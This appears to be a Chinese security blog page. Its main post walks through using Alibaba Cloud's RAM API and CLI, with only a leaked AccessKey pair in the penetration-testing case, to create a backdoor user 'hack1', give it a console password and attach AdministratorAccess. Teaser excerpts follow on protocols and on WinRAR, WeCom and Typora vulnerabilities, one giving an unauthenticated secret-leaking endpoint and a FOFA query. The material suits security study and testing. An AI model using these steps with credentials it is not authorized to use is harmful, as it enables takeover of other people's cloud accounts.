阿里云接管控制台

说到cli接管之前,首先需要看明白阿里云官方文档,搞清楚具体流程和官方工具和api的调用方式

参考文档

OpenAPI-访问控制接口文档:https://next.api.aliyun.com/document/Ram/2015-05-01/overview

阿里云CLI帮助文档:https://help.aliyun.com/product/29991.html

在线调试

首先看文档先调试一下

CreateUser_访问控制_API调试-阿里云OpenAPI开发者门户

对于RAM用户的概念不是很了解的可以参考什么是RAM用户_访问控制-阿里云帮助中心

用官方一点的话来说, RAM用户就是一种轻量级的身份凭证,可以用于授权和管理访问阿里云资源的权限, 每个RAM用户都有自己的登录凭证(AccessKey ID 和 Secret AccessKey),可以用ak、sk去调用它的api进行身份校验

登录控制台

这里使用我自己的账号作为演示,首先需要登录我的控制台账号

https://next.api.aliyun.com/api/Ram/2015-05-01/CreateUser

点击右上角登录控制台使用主账号登录

创建RAM用户

https://next.api.aliyun.com/api/Ram/2015-05-01/CreateUser

这里的在线调试可以清晰的看到调用结果和返回的数据

星号是必填项,其余参数也标注了是什么功能,这里是创建了一个aliyun的用户

image-20231117141020550

添加登录web控制台的权限

https://next.api.aliyun.com/api/Ram/2015-05-01/CreateLoginProfile

因为登录控制台肯定需要密码,所以这里指定一个密码

image-20231117142041941

查看云账号别名

https://next.api.aliyun.com/api/Ram/2015-05-01/GetAccountAlias

我们后续使用RAM用户登录控制台的时候需要云账号的别名,所以先查询之后做个记录

image-20231117142405114

查询所有RAM用户

https://next.api.aliyun.com/api/Ram/2015-05-01/ListUsers

这一步主要是确保账号添加成功

image-20231117142708757

尝试登录控制台

  1. 打开阿里云登陆页面,点击右下角RAM用户

    image-20231117143508872

    image-20231117143614092

  2. 这里填写用户名@别名 登录,密码为添加web控制台权限时设置的密码

    image-20231117143921087

  3. 成功登录aliyun用户

    image-20231117144035250

添加权限

虽然我们已经成功登陆了aliyun用户,但是!!!我们当时仅仅是创建了这个用户,并给他加了一个web控制台功能,并没有给他添加其他权限

所以我的账号这里,其实是有云上资源的,但是由于没有给aliyun用户赋权,所以他看不到任何东西,如下图:

image-20231117144626473

所以我们要给这个aliyun用户进行赋权

但是在这之前我们需要先查看一下权限策略

https://next.api.aliyun.com/api/Ram/2015-05-01/ListPolicies

image-20231117145011178

他的PolicyType是System ,PolicyName是AdministratorAccess ,这个是阿里云默认的,也就是管理所有阿里云资源的权限。

我们现在给aliyun用户加上该权限

https://next.api.aliyun.com/api/Ram/2015-05-01/AttachPolicyToUser

image-20231117145433456

返回Requestid就是赋权成功了

查看授权列表

https://next.api.aliyun.com/api/Ram/2015-05-01/ListPoliciesForUser

我们再来验证一下是否赋权成功

image-20231117145711424

这里可以看到返回了AdministratorAccess

重新登录

https://home.console.aliyun.com/home/dashboard/ProductAndService

重新登陆aliyun用户或者刷新一下登录的页面便可以看到所有的资源内容了

image-20231117150123169

命令行接管控制台

但是渗透测试的过程中,只有一个ak和sk,web调试页面登录不进去该怎么办呢?

不知道大家注意到没有,在调试的页面有一个CLI示例的按钮,我们点进去会发现一个控制台的命令

image-20231117150607709

但是我们要怎么用呢?点击下面的**阿里云CLI使用指南**可以看到安装及使用相关的文档,这里不再赘述了

验证阿里云CLI是否安装成功

1
aliyun version

image-20231117160631045

运行上述命令看到版本号即代表安装成功,下面我们通过命令行来进行上述操作

登录控制台

1
2
aliyun configure --profile user1 
# user1为配置文件名称可以随意填写

看到下图中的内容就表示登录成功啦^_^

image-20231117161233286

创建RAM用户

1
aliyun ram CreateUser --UserName hack1

image-20231117161631158

添加登录web控制台的权限

1
aliyun ram CreateLoginProfile --UserName hack1 --Password www.ixxzhi.cn

image-20231117161856679

查看用户创建成功没

1
aliyun ram ListUsers

image-20231117162256608

查看云账号别名

1
aliyun ram GetAccountAlias

image-20231117162028916

查看PolicyName和PolicyType

image-20231117162521721

添加权限

1
aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName hack1

image-20231117162632706

登录web控制台

这一步同上面

Q1:如何删除用户

因为我们是管理员权限,所以需要先撤销权限

1
aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName hack1

image-20231117163937077

然后再删除用户

1
aliyun ram DeleteUser --UserName hack1

image-20231117164001528

Q2:这么多命令记不住怎么办?

执行下列命令试试?

1
2
3
4
aliyun --help
aliyun ram
aliyun ram | grep List
aliyun ram DeleteUser --help

TCP协议详解

TCP简介

TCP,即Transmission Control Protocol,传输控制协议。人如其名,要对数据的传输进行一个详细的控制。

image-20230919164323119

阅读全文

DNS协议详解

什么是DNS协议

​ DNS是一种可以将域名和IP地址相互映射的以层次结构分布的数据库系统。DNS系统采用递归查询请求的方式来响应用户的查询,为互联网的运行提供关键性的基础服务。目前绝大多数的防火墙和网络都会开放DNS服务,DNS数据包不会被拦截,因此可以基于DNS协议建立隐蔽信道,从而顺利穿过防火墙,在客户端和服务器之间传输数据。

DNS服务器

​ 域名对应的IP地址都保存在DNS服务器。我们输入域名,浏览器就会在后台自动向DNS服务器发出请求,获取对应的IP地址。这就是DNS查询。

image-20230912163342906

​ 举个栗子,当我在浏览器输入www.ixxzhi.cn这个域名,浏览器就要像DNS服务器查询www.ixxzhi.cn对应的IP地址是什么,然后向该IP发出访问请求。

​ 网上有很多公用的DNS服务器,我们选择Cloudflare公司提供的1.1.1.1进行演示。

阅读全文

kerberos(待更新)

Kerberos协议

Kerberos概述

​ Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。

img

Kerberos基本概念

  • Key Distribution Center,or KDC

    在启用Kerberos的环境中进行身份验证的受信任源。

  • Kerberos KDC Server

    作为密钥分发中心(KDC)的计算机或服务器。

  • Kerberos Client

    集群中针对KDC进行身份验证的任何计算机。

  • KDC Admin Account

    Ambari

阅读全文

yak学习笔记

Yaklang语言简介

Yaklang 是一门上下文无关文法定义的 图灵完备 的程序语言,他基于 YakVM 运行,语法规则定义了 Yaklang 的语言结构

Yaklang 是一个 动态强类型语言

  1. Yaklang 允许用户可以在改变变量的值的时候也改变变量的类型;
  2. 在进行表达式运算的时候 Yaklang 允许程序或函数识别运行时的准确类型,并进行对应计算;

Yaklang 可以 编译 为 YakVM 可以支持的字节码运行;

Yaklang 语法博采众长,非常容易上手与学习;

Yaklang 可以作为一门“嵌入式语言”被其他语言调用或编译;

Yaklang 是业内第一门 CDSL (Cybersecurity Domain Specific Language),使用图灵完备特性融合原子化的安全能力。

阅读全文

winrar_RCE(CVE-2023-38831)漏洞复现

漏洞详情

漏洞名称:WinRAR远程代码执行漏洞

漏洞编号:CVE-2023-38831

漏洞原理:WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如txt文件)后,将在受害者机器上执行任意代码。

阅读全文

2023企业微信0Day漏洞复现

漏洞概述

漏洞编号:

漏洞信息:企业微信0day漏洞可以在/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取。

漏洞危害:

  1. 可导致企业微信全量数据被获取
  2. 存在使用企业微信轻应用对内发送钓鱼文件和链接等风险

影响版本:2.5.x、2.6.93000以下

漏洞复现

FOFA语法:app=”Tencent-企业微信”

阅读全文

Typora_RCE漏洞(CVE-2023-2317)

漏洞详情

漏洞名称:Typora远程代码执行漏洞

漏洞编号:CVE-2023-2317

漏洞原理:Windows和Linux版本1.6.7之前的Typora中的updater/updater.html中存在基于DOM型的XSS漏洞,该漏洞允许通过加载特制的markdown文件从而使得执行任意Javascript代码。如果用户打开恶意markdown文件或者从恶意网站复制文本并将其粘贴到Typora,通过在<embed>标签中引用updater.html,则可以利用此漏洞,此外,攻击者可以使用特权接口reqnode访问节点模块child_process并执行任意系统命令。

阅读全文